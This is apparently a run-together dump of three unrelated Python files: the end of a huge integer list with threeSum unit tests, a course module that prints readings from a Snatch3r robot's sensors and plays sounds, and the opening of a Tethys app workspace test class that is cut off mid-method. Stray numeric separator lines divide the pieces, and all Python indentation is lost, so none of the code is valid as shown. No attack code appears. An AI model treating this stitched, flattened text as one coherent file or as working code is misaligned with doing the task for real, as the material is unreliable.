-6167,
12808,
99918,
30113,
-12641,
-26665,
86362,
-33505,
50661,
26714,
33701,
89012,
-91540,
40517,
-12716,
-57185,
-87230,
29914,
-59560,
13200,
-72723,
58272,
23913,
-45586,
-96593,
-26265,
-2141,
31087,
81399,
92511,
-34049,
20577,
2803,
26003,
8940,
42117,
40887,
-82715,
38269,
40969,
-50022,
72088,
21291,
-67280,
-16523,
90535,
18669,
94342,
-39568,
-88080,
-99486,
-20716,
23108,
-28037,
63342,
36863,
-29420,
-44016,
75135,
73415,
16059,
-4899,
86893,
43136,
-7041,
33483,
-67612,
25327,
40830,
6184,
61805,
4247,
81119,
-22854,
-26104,
-63466,
63093,
-63685,
60369,
51023,
51644,
-16350,
74438,
-83514,
99083,
10079,
-58451,
-79621,
48471,
67131,
-86940,
99093,
11855,
-22272,
-67683,
-44371,
9541,
18123,
37766,
-70922,
80385,
-57513,
-76021,
-47890,
36154,
72935,
84387,
-92681,
-88303,
-7810,
59902,
-90,
-64704,
-28396,
-66403,
8860,
13343,
33882,
85680,
7228,
28160,
-14003,
54369,
-58893,
92606,
-63492,
-10101,
64714,
58486,
29948,
-44679,
-22763,
10151,
-56695,
4031,
-18242,
-36232,
86168,
-14263,
9883,
47124,
47271,
92761,
-24958,
-73263,
-79661,
-69147,
-18874,
29546,
-92588,
-85771,
26451,
-86650,
-43306,
-59094,
-47492,
-34821,
-91763,
-47670,
33537,
22843,
67417,
-759,
92159,
63075,
94065,
-26988,
55276,
65903,
30414,
-67129,
-99508,
-83092,
-91493,
-50426,
14349,
-83216,
-76090,
32742,
-5306,
-93310,
-60750,
-60620,
-45484,
-21108,
-58341,
-28048,
-52803,
69735,
78906,
81649,
32565,
-86804,
-83202,
-65688,
-1760,
89707,
93322,
-72750,
84134,
71900,
-37720,
19450,
-78018,
22001,
-23604,
26276,
-21498,
65892,
-72117,
-89834,
-23867,
55817,
-77963,
42518,
93123,
-83916,
63260,
-2243,
-97108,
85442,
-36775,
17984,
-58810,
99664,
-19082,
93075,
-69329,
87061,
79713,
16296,
70996,
13483,
-74582,
49900,
-27669,
-40562,
1209,
-20572,
34660,
83193,
75579,
7344,
64925,
88361,
60969,
3114,
44611,
-27445,
53049,
-16085,
-92851,
-53306,
13859,
-33532,
86622,
-75666,
-18159,
-98256,
51875,
-42251,
-27977,
-18080,
23772,
38160,
41779,
9147,
94175,
99905,
-85755,
62535,
-88412,
-52038,
-68171,
93255,
-44684,
-11242,
-104,
31796,
62346,
-54931,
-55790,
-70032,
46221,
56541,
-91947,
90592,
93503,
4071,
20646,
4856,
-63598,
15396,
-50708,
32138,
-85164,
38528,
-89959,
53852,
57915,
-42421,
-88916,
-75072,
67030,
-29066,
49542,
-71591,
61708,
-53985,
-43051,
28483,
46991,
-83216,
80991,
-46254,
-48716,
39356,
-8270,
-47763,
-34410,
874,
-1186,
-7049,
28846,
11276,
21960,
-13304,
-11433,
-4913,
55754,
79616,
70423,
-27523,
64803,
49277,
14906,
-97401,
-92390,
91075,
70736,
21971,
-3303,
55333,
-93996,
76538,
54603,
-75899,
98801,
46887,
35041,
48302,
-52318,
55439,
24574,
14079,
-24889,
83440,
14961,
34312,
-89260,
-22293,
-81271,
-2586,
-71059,
-10640,
-93095,
-5453,
-70041,
66543,
74012,
-11662,
-52477,
-37597,
-70919,
92971,
-17452,
-67306,
-80418,
7225,
-89296,
24296,
86547,
37154,
-10696,
74436,
-63959,
58860,
33590,
-88925,
-97814,
-83664,
85484,
-8385,
-50879,
57729,
-74728,
-87852,
-15524,
-91120,
22062,
28134,
80917,
32026,
49707,
-54252,
-44319,
-35139,
13777,
44660,
85274,
25043,
58781,
-89035,
-76274,
6364,
-63625,
72855,
43242,
-35033,
12820,
-27460,
77372,
-47578,
-61162,
-70758,
-1343,
-4159,
64935,
56024,
-2151,
43770,
19758,
-30186,
-86040,
24666,
-62332,
-67542,
73180,
-25821,
-27826,
-45504,
-36858,
-12041,
20017,
-24066,
-56625,
-52097,
-47239,
-90694,
8959,
7712,
-14258,
-5860,
55349,
61808,
-4423,
-93703,
64681,
-98641,
-25222,
46999,
-83831,
-54714,
19997,
-68477,
66073,
51801,
-66491,
52061,
-52866,
79907,
-39736,
-68331,
68937,
91464,
98892,
910,
93501,
31295,
-85873,
27036,
-57340,
50412,
21,
-2445,
29471,
71317,
82093,
-94823,
-54458,
-97410,
39560,
-7628,
66452,
39701,
54029,
37906,
46773,
58296,
60370,
-61090,
85501,
-86874,
71443,
-72702,
-72047,
14848,
34102,
77975,
-66294,
-36576,
31349,
52493,
-70833,
-80287,
94435,
39745,
-98291,
84524,
-18942,
10236,
93448,
50846,
94023,
-6939,
47999,
14740,
30165,
81048,
84935,
-19177,
-13594,
32289,
62628,
-90612,
-542,
-66627,
64255,
71199,
-83841,
-82943,
-73885,
8623,
-67214,
-9474,
-35249,
62254,
-14087,
-90969,
21515,
-83303,
94377,
-91619,
19956,
-98810,
96727,
-91939,
29119,
-85473,
-82153,
-69008,
44850,
74299,
-76459,
-86464,
8315,
-49912,
-28665,
59052,
-69708,
76024,
-92738,
50098,
18683,
-91438,
18096,
-19335,
35659,
91826,
15779,
-73070,
67873,
-12458,
-71440,
-46721,
54856,
97212,
-81875,
35805,
36952,
68498,
81627,
-34231,
81712,
27100,
-9741,
-82612,
18766,
-36392,
2759,
41728,
69743,
26825,
48355,
-17790,
17165,
56558,
3295,
-24375,
55669,
-16109,
24079,
73414,
48990,
-11931,
-78214,
90745,
19878,
35673,
-15317,
-89086,
94675,
-92513,
88410,
-93248,
-19475,
-74041,
-19165,
32329,
-26266,
-46828,
-18747,
45328,
8990,
-78219,
-25874,
-74801,
-44956,
-54577,
-29756,
-99822,
-35731,
-18348,
-68915,
-83518,
-53451,
95471,
-2954,
-13706,
-8763,
-21642,
-37210,
16814,
-60070,
-42743,
27697,
-36333,
-42362,
11576,
85742,
-82536,
68767,
-56103,
-63012,
71396,
-78464,
-68101,
-15917,
-11113,
-3596,
77626,
-60191,
-30585,
-73584,
6214,
-84303,
18403,
23618,
-15619,
-89755,
-59515,
-59103,
-74308,
-63725,
-29364,
-52376,
-96130,
70894,
-12609,
50845,
-2314,
42264,
-70825,
64481,
55752,
4460,
-68603,
-88701,
4713,
-50441,
-51333,
-77907,
97412,
-66616,
-49430,
60489,
-85262,
-97621,
-18980,
44727,
-69321,
-57730,
66287,
-92566,
-64427,
-14270,
11515,
-92612,
-87645,
61557,
24197,
-81923,
-39831,
-10301,
-23640,
-76219,
-68025,
92761,
-76493,
68554,
-77734,
-95620,
-11753,
-51700,
98234,
-68544,
-61838,
29467,
46603,
-18221,
-35441,
74537,
40327,
-58293,
75755,
-57301,
-7532,
-94163,
18179,
-14388,
-22258,
-46417,
-48285,
18242,
-77551,
82620,
250,
-20060,
-79568,
-77259,
82052,
-98897,
-75464,
48773,
-79040,
-11293,
45941,
-67876,
-69204,
-46477,
-46107,
792,
60546,
-34573,
-12879,
-94562,
20356,
-48004,
-62429,
96242,
40594,
2099,
99494,
25724,
-39394,
-2388,
-18563,
-56510,
-83570,
-29214,
3015,
74454,
74197,
76678,
-46597,
60630,
-76093,
37578,
-82045,
-24077,
62082,
-87787,
-74936,
58687,
12200,
-98952,
70155,
-77370,
21710,
-84625,
-60556,
-84128,
925,
65474,
-15741,
-94619,
88377,
89334,
44749,
22002,
-45750,
-93081,
-14600,
-83447,
46691,
85040,
-66447,
-80085,
56308,
44310,
24979,
-29694,
57991,
4675,
-71273,
-44508,
13615,
-54710,
23552,
-78253,
-34637,
50497,
68706,
81543,
-88408,
-21405,
6001,
-33834,
-21570,
-46692,
-25344,
20310,
71258,
-97680,
11721,
59977,
59247,
-48949,
98955,
-50276,
-80844,
-27935,
-76102,
55858,
-33492,
40680,
66691,
-33188,
8284,
64893,
-7528,
6019,
-85523,
8434,
-64366,
-56663,
26862,
30008,
-7611,
-12179,
-70076,
21426,
-11261,
-36864,
-61937,
-59677,
929,
-21052,
3848,
-20888,
-16065,
98995,
-32293,
-86121,
-54564,
77831,
68602,
74977,
31658,
40699,
29755,
98424,
80358,
-69337,
26339,
13213,
-46016,
-18331,
64713,
-46883,
-58451,
-70024,
-92393,
-4088,
70628,
-51185,
71164,
-75791,
-1636,
-29102,
-16929,
-87650,
-84589,
-24229,
-42137,
-15653,
94825,
13042,
88499,
-47100,
-90358,
-7180,
29754,
-65727,
-42659,
-85560,
-9037,
-52459,
20997,
-47425,
17318,
21122,
20472,
-23037,
65216,
-63625,
-7877,
-91907,
24100,
-72516,
22903,
-85247,
-8938,
73878,
54953,
87480,
-31466,
-99524,
35369,
-78376,
89984,
-15982,
94045,
-7269,
23319,
-80456,
-37653,
-76756,
2909,
81936,
54958,
-12393,
60560,
-84664,
-82413,
66941,
-26573,
-97532,
64460,
18593,
-85789,
-38820,
-92575,
-43663,
-89435,
83272,
-50585,
13616,
-71541,
-53156,
727,
-27644,
16538,
34049,
57745,
34348,
35009,
16634,
-18791,
23271,
-63844,
95817,
21781,
16590,
59669,
15966,
-6864,
48050,
-36143,
97427,
-59390,
96931,
78939,
-1958,
50777,
43338,
-51149,
39235,
-27054,
-43492,
67457,
-83616,
37179,
10390,
85818,
2391,
73635,
87579,
-49127,
-81264,
-79023,
-81590,
53554,
-74972,
-83940,
-13726,
-39095,
29174,
78072,
76104,
47778,
25797,
-29515,
-6493,
-92793,
22481,
-36197,
-65560,
42342,
15750,
97556,
99634,
-56048,
-35688,
13501,
63969,
-74291,
50911,
39225,
93702,
-3490,
-59461,
-30105,
-46761,
-80113,
92906,
-68487,
50742,
36152,
-90240,
-83631,
24597,
-50566,
-15477,
18470,
77038,
40223,
-80364,
-98676,
70957,
-63647,
99537,
13041,
31679,
86631,
37633,
-16866,
13686,
-71565,
21652,
-46053,
-80578,
-61382,
68487,
-6417,
4656,
20811,
67013,
-30868,
-11219,
46,
74944,
14627,
56965,
42275,
-52480,
52162,
-84883,
-52579,
-90331,
92792,
42184,
-73422,
-58440,
65308,
-25069,
5475,
-57996,
59557,
-17561,
2826,
-56939,
14996,
-94855,
-53707,
99159,
43645,
-67719,
-1331,
21412,
41704,
31612,
32622,
1919,
-69333,
-69828,
22422,
-78842,
57896,
-17363,
27979,
-76897,
35008,
46482,
-75289,
65799,
20057,
7170,
41326,
-76069,
90840,
-81253,
-50749,
3649,
-42315,
45238,
-33924,
62101,
96906,
58884,
-7617,
-28689,
-66578,
62458,
50876,
-57553,
6739,
41014,
-64040,
-34916,
37940,
13048,
-97478,
-11318,
-89440,
-31933,
-40357,
-59737,
-76718,
-14104,
-31774,
28001,
4103,
41702,
-25120,
-31654,
63085,
-3642,
84870,
-83896,
-76422,
-61520,
12900,
88678,
85547,
33132,
-88627,
52820,
63915,
-27472,
78867,
-51439,
33005,
-23447,
-3271,
-39308,
39726,
-74260,
-31874,
-36893,
93656,
910,
-98362,
60450,
-88048,
99308,
13947,
83996,
-90415,
-35117,
70858,
-55332,
-31721,
97528,
82982,
-86218,
6822,
25227,
36946,
97077,
-4257,
-41526,
56795,
89870,
75860,
-70802,
21779,
14184,
-16511,
-89156,
-31422,
71470,
69600,
-78498,
74079,
-19410,
40311,
28501,
26397,
-67574,
-32518,
68510,
38615,
19355,
-6088,
-97159,
-29255,
-92523,
3023,
-42536,
-88681,
64255,
41206,
44119,
52208,
39522,
-52108,
91276,
-70514,
83436,
63289,
-79741,
9623,
99559,
12642,
85950,
83735,
-21156,
-67208,
98088,
-7341,
-27763,
-30048,
-44099,
-14866,
-45504,
-91704,
19369,
13700,
10481,
-49344,
-85686,
33994,
19672,
36028,
60842,
66564,
-24919,
33950,
-93616,
-47430,
-35391,
-28279,
56806,
74690,
39284,
-96683,
-7642,
-75232,
37657,
-14531,
-86870,
-9274,
-26173,
98640,
88652,
64257,
46457,
37814,
-19370,
9337,
-22556,
-41525,
39105,
-28719,
51611,
-93252,
98044,
-90996,
21710,
-47605,
-64259,
-32727,
53611,
-31918,
-3555,
33316,
-66472,
21274,
-37731,
-2919,
15016,
48779,
-88868,
1897,
41728,
46344,
-89667,
37848,
68092,
-44011,
85354,
-43776,
38739,
-31423,
-66330,
65167,
-22016,
59405,
34328,
-60042,
87660,
-67698,
-59174,
-1408,
-46809,
-43485,
-88807,
-60489,
13974,
22319,
55836,
-62995,
-37375,
-4185,
32687,
-36551,
-75237,
58280,
26942,
-73756,
71756,
78775,
-40573,
14367,
-71622,
-77338,
24112,
23414,
-7679,
-51721,
87492,
85066,
-21612,
57045,
10673,
-96836,
52461,
-62218,
-9310,
65862,
-22748,
89906,
-96987,
-98698,
26956,
-43428,
46141,
47456,
28095,
55952,
67323,
-36455,
-60202,
-43302,
-82932,
42020,
77036,
10142,
60406,
70331,
63836,
58850,
-66752,
52109,
21395,
-10238,
-98647,
-41962,
27778,
69060,
98535,
-28680,
-52263,
-56679,
66103,
-42426,
27203,
80021,
10153,
58678,
36398,
63112,
34911,
20515,
62082,
-15659,
-40785,
27054,
43767,
-20289,
65838,
-6954,
-60228,
-72226,
52236,
-35464,
25209,
-15462,
-79617,
-41668,
-84083,
62404,
-69062,
18913,
46545,
20757,
13805,
24717,
-18461,
-47009,
-25779,
68834,
64824,
34473,
39576,
31570,
14861,
-15114,
-41233,
95509,
68232,
67846,
84902,
-83060,
17642,
-18422,
73688,
77671,
-26930,
64484,
-99637,
73875,
6428,
21034,
-73471,
19664,
-68031,
15922,
-27028,
48137,
54955,
-82793,
-41144,
-10218,
-24921,
-28299,
-2288,
68518,
-54452,
15686,
-41814,
66165,
-72207,
-61986,
80020,
50544,
-99500,
16244,
78998,
40989,
14525,
-56061,
-24692,
-94790,
21111,
37296,
-90794,
72100,
70550,
-31757,
17708,
-74290,
61910,
78039,
-78629,
-25033,
73172,
-91953,
10052,
64502,
99585,
-1741,
90324,
-73723,
68942,
28149,
30218,
24422,
16659,
10710,
-62594,
94249,
96588,
46192,
34251,
73500,
-65995,
-81168,
41412,
-98724,
-63710,
-54696,
-52407,
19746,
45869,
27821,
-94866,
-76705,
-13417,
-61995,
-71560,
43450,
67384,
-8838,
-80293,
-28937,
23330,
-89694,
-40586,
46918,
80429,
-5475,
78013,
25309,
-34162,
37236,
-77577,
86744,
26281,
-29033,
-91813,
35347,
13033,
-13631,
-24459,
3325,
-71078,
-75359,
81311,
19700,
47678,
-74680,
-84113,
45192,
35502,
37675,
19553,
76522,
-51098,
-18211,
89717,
4508,
-82946,
27749,
85995,
89912,
-53678,
-64727,
-14778,
32075,
-63412,
-40524,
86440,
-2707,
-36821,
63850,
-30883,
67294,
-99468,
-23708,
34932,
34386,
98899,
29239,
-23385,
5897,
54882,
98660,
49098,
70275,
17718,
88533,
52161,
63340,
50061,
-89457,
19491,
-99156,
24873,
-17008,
64610,
-55543,
50495,
17056,
-10400,
-56678,
-29073,
-42960,
-76418,
98562,
-88104,
-96255,
10159,
-90724,
54011,
12052,
45871,
-90933,
-69420,
67039,
37202,
78051,
-52197,
-40278,
-58425,
65414,
-23394,
-1415,
6912,
-53447,
7352,
17307,
-78147,
63727,
98905,
55412,
-57658,
-32884,
-44878,
22755,
39730,
3638,
35111,
39777,
74193,
38736,
-11829,
-61188,
-92757,
55946,
-71232,
-63032,
-83947,
39147,
-96684,
-99233,
25131,
-32197,
24406,
-55428,
-61941,
25874,
-69453,
64483,
-19644,
-68441,
12783,
87338,
-48676,
66451,
-447,
-61590,
50932,
-11270,
29035,
65698,
-63544,
10029,
80499,
-9461,
86368,
91365,
-81810,
-71914,
-52056,
-13782,
44240,
-30093,
-2437,
24007,
67581,
-17365,
-69164,
-8420,
-69289,
-29370,
48010,
90439,
13141,
69243,
50668,
39328,
61731,
78266,
-81313,
17921,
-38196,
55261,
9948,
-24970,
75712,
-72106,
28696,
7461,
31621,
61047,
51476,
56512,
11839,
-96916,
-82739,
28924,
-99927,
58449,
37280,
69357,
11219,
-32119,
-62050,
-48745,
-83486,
-52376,
42668,
82659,
68882,
38773,
46269,
-96005,
97630,
25009,
-2951,
-67811,
99801,
81587,
-79793,
-18547,
-83086,
69512,
33127,
-92145,
-88497,
47703,
59527,
1909,
88785,
-88882,
69188,
-46131,
-5589,
-15086,
36255,
-53238,
-33009,
82664,
53901,
35939,
-42946,
-25571,
33298,
69291,
53199,
74746,
-40127,
-39050,
91033,
51717,
-98048,
87240,
36172,
65453,
-94425,
-63694,
-30027,
59004,
88660,
3649,
-20267,
-52565,
-67321,
34037,
4320,
91515,
-56753,
60115,
27134,
68617,
-61395,
-26503,
-98929,
-8849,
-63318,
10709,
-16151,
61905,
-95785,
5262,
23670,
-25277,
90206,
-19391,
45735,
37208,
-31992,
-92450,
18516,
-90452,
-58870,
-58602,
93383,
14333,
17994,
82411,
-54126,
-32576,
35440,
-60526,
-78764,
-25069,
-9022,
-394,
92186,
-38057,
55328,
-61569,
67780,
77169,
19546,
-92664,
-94948,
44484,
-13439,
83529,
27518,
-48333,
72998,
38342,
-90553,
-98578,
-76906,
81515,
-16464,
78439,
92529,
35225,
-39968,
-10130,
-7845,
-32245,
-74955,
-74996,
67731,
-13897,
-82493,
33407,
93619,
59560,
-24404,
-57553,
19486,
-45341,
34098,
-24978,
-33612,
79058,
71847,
76713,
-95422,
6421,
-96075,
-59130,
-28976,
-16922,
-62203,
69970,
68331,
21874,
40551,
89650,
51908,
58181,
66480,
-68177,
34323,
-3046,
-49656,
-59758,
43564,
-10960,
-30796,
15473,
-20216,
46085,
-85355,
41515,
-30669,
-87498,
57711,
56067,
63199,
-83805,
62042,
91213,
-14606,
4394,
-562,
74913,
10406,
96810,
-61595,
32564,
31640,
-9732,
42058,
98052,
-7908,
-72330,
1558,
-80301,
34878,
32900,
3939,
-8824,
88316,
20937,
21566,
-3218,
-66080,
-31620,
86859,
54289,
90476,
-42889,
-15016,
-18838,
75456,
30159,
-67101,
42328,
-92703,
85850,
-5475,
23470,
-80806,
68206,
17764,
88235,
46421,
-41578,
74005,
-81142,
80545,
20868,
-1560,
64017,
83784,
68863,
-97516,
-13016,
-72223,
79630,
-55692,
82255,
88467,
28007,
-34686,
-69049,
-41677,
88535,
-8217,
68060,
-51280,
28971,
49088,
49235,
26905,
-81117,
-44888,
40623,
74337,
-24662,
97476,
79542,
-72082,
-35093,
98175,
-61761,
-68169,
59697,
-62542,
-72965,
59883,
-64026,
-37656,
-92392,
-12113,
-73495,
98258,
68379,
-21545,
64607,
-70957,
-92254,
-97460,
-63436,
-8853,
-19357,
-51965,
-76582,
12687,
-49712,
45413,
-60043,
33496,
31539,
-57347,
41837,
67280,
-68813,
52088,
-13155,
-86430,
-15239,
-45030,
96041,
18749,
-23992,
46048,
35243,
-79450,
85425,
-58524,
88781,
-39454,
53073,
-48864,
-82289,
39086,
82540,
-11555,
25014,
-5431,
-39585,
-89526,
2705,
31953,
-81611,
36985,
-56022,
68684,
-27101,
11422,
64655,
-26965,
-63081,
-13840,
-91003,
-78147,
-8966,
41488,
1988,
99021,
-61575,
-47060,
65260,
-23844,
-21781,
-91865,
-19607,
44808,
2890,
63692,
-88663,
-58272,
15970,
-65195,
-45416,
-48444,
-78226,
-65332,
-24568,
42833,
-1806,
-71595,
80002,
-52250,
30952,
48452,
-90106,
31015,
-22073,
62339,
63318,
78391,
28699,
77900,
-4026,
-76870,
-45943,
33665,
9174,
-84360,
-22684,
-16832,
-67949,
-38077,
-38987,
-32847,
51443,
-53580,
-13505,
9344,
-92337,
26585,
70458,
-52764,
-67471,
-68411,
-1119,
-2072,
-93476,
67981,
40887,
-89304,
-12235,
41488,
1454,
5355,
-34855,
-72080,
24514,
-58305,
3340,
34331,
8731,
77451,
-64983,
-57876,
82874,
62481,
-32754,
-39902,
22451,
-79095,
-23904,
78409,
-7418,
77916
]
# print(threeSum(nums_list))
# print(find_index_of_first_positive(sorted(nums_list)))
class TestThreeSum(TestCase):
def test_sum(self):
self.assertEqual(threeSum([-1, 0, 1, 2, -1, -4]), [[-1, -1, 2]])
self.assertEqual(threeSum([0, 0, 0, 0]), [])
self.assertEqual(threeSum([0, 0]), [])
self.assertEqual(threeSum([-2, 0, 1, 1, 2]), [[-2, 0, 2], [-2, 1, 1]])
self.assertEqual(threeSum([-1, 0, 1, 0]), [[-1, 0, 1]])
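# Minimal sketch (not in the original file): run the TestThreeSum cases above directly.
# Only TestCase was imported at the top, so the unittest module itself is imported here.
if __name__ == '__main__':
    import unittest
    unittest.main()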
| 36,390 | 26,061 |
"""
Capstone Team Project. Code to run on a ROBOT (NOT a laptop).
This module is for testing STAND-ALONE code running on the ROBOT
(WITHOUT having LAPTOP GUI code running on the LAPTOP at the same time).
It tests the various SENSORS available to you.
Authors: Your professors (for the framework).
Winter term, 2019-2020.
"""
###############################################################################
# STUDENTS: This module is ALREADY IMPLEMENTED.
# RUN it to test the sensors.
# You may MODIFY or AUGMENT this module as you choose.
###############################################################################
import libs.rosebot as rb
import time
def main():
""" Tests the various Sensors of a Snatch3r robot. """
print()
print("--------------------------------------------------")
print("Testing the various Sensors of a robot")
print("--------------------------------------------------")
# Change the following if you want the readings to appear
# more slowly (try 1.0) or more quickly (try 0.1).
# The default is half a second between readings.
seconds_between_readings = 0.5 # Default: 0.5 second between each reading.
print()
print("This program displays readings from most")
print("of the sensors on your Snatch3r robot.")
print("It also makes sounds.")
print(" 1. If you want to SKIP readings from a")
print(" particular sensor, or sounds, either:")
print(" -- comment-out its call in MAIN, or")
print(" -- press Control-C when that sensor starts.")
print(" 2. The readings are displayed at a rate of")
print(" {:5.2} seconds per reading, by default.".format(
seconds_between_readings))
print(" Change the number in MAIN (or in the function")
print(" function calls in MAIN), if you want them")
print(" more quickly or slowly.")
# Comment-out the tests/readings you want to skip.
make_sounds()
print_touch_sensor_readings(seconds_between_readings)
print_color_sensor_readings(seconds_between_readings)
print_infrared_proximity_readings(seconds_between_readings)
print_beacon_sensor_readings(seconds_between_readings)
print_remote_control_readings(seconds_between_readings)
print_camera_readings(seconds_between_readings)
def make_sounds():
try:
robot = rb.RoseBot()
print()
print("--------------------------------------------------")
print("Demonstrating how to make sounds.")
print("--------------------------------------------------")
print()
print("Remember: Leave time between any sound-making,")
print("else sounds may be clipped. If sounds are")
print("clipped, you may have to reboot the robot.")
print()
print("Beep 5 times.")
for k in range(5):
robot.sound.beep()
time.sleep(0.2)
print()
print("Play a fun song.")
robot.sound.play_vader_song()
print()
print("Play 5 tones.")
for tone in range(100, 350, 50):
duration = 50 # milliseconds
robot.sound.play_tone(tone, duration)
print()
print("Play a 6-tone sequence.")
robot.sound.play_tone_sequence([(100, 200, 10),
(150, 50, 50),
(200, 100, 10),
(250, 1000, 20),
(300, 50, 5),
(350, 50, 10)])
print()
print("Play a WAV file.")
robot.sound.play_lego_wav_file()
print()
print("Speak. Speaking may not work if you make")
print("other sounds before speaking.")
print("After speaking, other sounds may fail.")
print("Leave plenty of time for the speech")
print("to happen, and use SHORT phrases.")
robot.sound.speak("Greetings, Earthlings.")
time.sleep(3)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_touch_sensor_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Touch Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the physical Touch Sensor that is underneath")
print("the physical motor at the top of the Arm and Claw.")
print()
print("While this test is running, try pressing and releasing")
print("that physical Touch Sensor to see its readings.")
print("")
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
print("Pressed (True or False)? Value (0 or 1)?: {:5} {}".format(
str(robot.touch_sensor.is_pressed()),
robot.touch_sensor.get_reading()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_color_sensor_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Color Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the downward-facing physical Color Sensor.")
print()
print("While this test is running, try moving the robot around,")
print("placing the physical Color Sensor on different colors.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
print("As name, number, reflectance: {:8} {:1} {:3}".format(
robot.color_sensor.get_color_as_name(),
robot.color_sensor.get_color_as_number(),
robot.color_sensor.get_reflected_light_intensity()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_infrared_proximity_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Infrared Proximity Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the forward-facing physical Infrared Proximity")
print("Sensor (the thing on the front of the claw).")
print()
print("While this test is running, try putting your hand")
print("different distances from that physical Infrared sensor.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
print("Distance in inches: {:5.2f}".format(
robot.infrared_proximity_sensor.get_distance_in_inches()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_beacon_sensor_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Beacon Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the Beacon (the stand-alone remote-control thing).")
print()
print("While this test is running, try turning the Beacon")
print("on, then moving it to various places in front")
print("of the robot, as well as places out of the Infrared")
print("Sensors field of vision. Then try turning the Beacon off.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
message = "Distance (inches), heading (sort of degrees): {:3} {:3}"
print(message.format(robot.beacon_sensor.get_distance(),
robot.beacon_sensor.get_heading()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_remote_control_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Remote Control Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the Remote Control (the stand-alone thing).")
print()
print("While this test is running, try pressing the")
print("Remote Control's four buttons (one at a time)")
print("while pointing the Remote Control toward the front")
print("of the robot (and elsewhere too).")
print()
print("Also try the red switch as its four settings.")
print("When no button is pressed, nothing will be printed.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
for red_switch in [1, 2, 3, 4]:
for button in ["red_up", "red_down", "blue_up", "blue_down"]:
if robot.remote_control.is_pressed(red_switch, button):
msg = "Button {} with red switch at {} is pressed."
print(msg.format(button, red_switch))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_camera_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Camera of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the Camera.")
print()
print("Before running this test, train your Camera")
print("on a colored object to get a good color model.")
print("Also, make sure the Camera is NOT")
print("in Arduino mode.")
print()
print("While this test is running, try putting the object")
print("that you used for training in front of the physical")
print("camera, then slowly moving it to various places")
print("to the left/right and up/down, as well as")
print("places out of the Camera's field of vision.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
blob = robot.camera.get_biggest_blob()
print(blob)
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
| 12,750 | 3,543 |
import unittest
import tethys_apps.base.workspace as base_workspace
import os
import shutil
from unittest import mock
from ... import UserFactory
from django.http import HttpRequest
from django.contrib.auth.models import User
from django.core.exceptions import PermissionDenied
import tethys_apps.base.app_base as tethys_app_base
from tethys_apps.base.workspace import user_workspace, app_workspace, _get_app_workspace, _get_user_workspace
from tethys_quotas.models import ResourceQuota
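# The two module-level controllers below exercise the workspace decorators end to end:
# each decorator is expected to resolve the appropriate TethysWorkspace (user- or
# app-scoped), enforce the matching workspace quota, and pass the workspace into the
# wrapped controller as an argument, which the controller simply returns so the tests
# can assert on it. See tethys_apps.base.workspace for the authoritative behaviour.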
@user_workspace
def user_dec_controller(request, user_workspace):
return user_workspace
@app_workspace
def app_dec_controller(request, app_workspace):
return app_workspace
class TestWorkspace(unittest.TestCase):
def setUp(self):
self.root = os.path.abspath(os.path.dirname(__file__))
self.test_root = os.path.join(self.root, 'test_workspace')
self.test_root_a = os.path.join(self.test_root, 'test_workspace_a')
self.test_root2 = os.path.join(self.root, 'test_workspace2')
self.app = tethys_app_base.TethysAppBase()
self.user = UserFactory()
def tearDown(self):
if os.path.isdir(self.test_root):
shutil.rmtree(self.test_root)
if os.path.isdir(self.test_root2):
shutil.rmtree(self.test_root2)
def test_TethysWorkspace(self):
# Test Create new workspace folder test_workspace
result = base_workspace.TethysWorkspace(path=self.test_root)
workspace = '<TethysWorkspace path="{0}">'.format(self.test_root)
